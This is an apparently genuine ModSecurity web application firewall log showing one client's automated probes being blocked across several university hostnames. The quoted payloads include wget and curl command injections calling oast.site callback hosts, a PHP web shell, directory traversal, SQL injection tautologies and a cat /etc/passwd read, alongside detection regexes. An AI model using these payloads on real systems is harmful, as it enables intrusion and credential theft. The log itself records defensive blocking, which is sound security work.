[Tue Aug 29 11:34:38.331198 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgqw6oh6mnezjbh.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAULx7cAAABD"]
[Tue Aug 29 11:34:38.331573 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUDQSUAAAA7"]
[Tue Aug 29 11:34:38.331726 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlg9fpdeckgjcobr.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUNaj0AAABF"]
[Tue Aug 29 11:34:38.331883 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgey9o6j15okn69.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATlLEIAAAAq"]
[Tue Aug 29 11:34:38.334462 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgbnppedr5rtki3.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATZp5UAAAAf"]
[Tue Aug 29 11:34:38.357774 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAQKOvMAAAAs"]
[Tue Aug 29 11:34:38.439324 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgogftcnmhx7r3a.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAASI0DgAAAAG"]
[Tue Aug 29 11:34:39.364553 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11X8Co-f0AAATmZcsAAAAr"]
[Tue Aug 29 11:34:39.369373 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgjzf8q6q7mom5h.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/upload"] [unique_id "ZO11X8Co-f0AAAQKOvQAAAAs"]
[Tue Aug 29 11:34:39.408270 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11X8Co-f0AAATavuAAAAAg"]
[Tue Aug 29 11:34:40.326115 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgrcfgtjrdofrde.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11YMCo-f0AAAPDoPMAAAAP"]
[Tue Aug 29 11:34:41.324275 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAUFdekAAAA9"]
[Tue Aug 29 11:34:41.331976 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATxvX4AAAAw"]
[Tue Aug 29 11:34:41.335341 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAT2JPwAAAAz"]
[Tue Aug 29 11:34:41.374817 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATTmRcAAAAV"]
[Tue Aug 29 11:34:41.375078 2023] [:error] [pid 1252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATkXr4AAAAp"]
[Tue Aug 29 11:34:42.329314 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAUTiW8AAABJ"]
[Tue Aug 29 11:34:42.333663 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YsCo-f0AAAUZcE4AAABO"]
[Tue Aug 29 11:34:42.335752 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAASEJW0AAAAE"]
[Tue Aug 29 11:34:42.345113 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAPLwJIAAAAX"]
[Tue Aug 29 11:34:42.355396 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAATQXhAAAAAO"]
[Tue Aug 29 11:34:42.369097 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAASI0DsAAAAG"]
[Tue Aug 29 11:34:43.360114 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11Y8Co-f0AAATUxQcAAAAW"]
[Tue Aug 29 11:34:44.295746 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATTmRoAAAAV"]
[Tue Aug 29 11:34:44.301146 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUTiXEAAABJ"]
[Tue Aug 29 11:34:44.303886 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAASEJW4AAAAE"]
[Tue Aug 29 11:34:44.306190 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATmZc8AAAAr"]
[Tue Aug 29 11:34:44.308064 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATqf74AAAAu"]
[Tue Aug 29 11:34:44.339966 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUIz7UAAABA"]
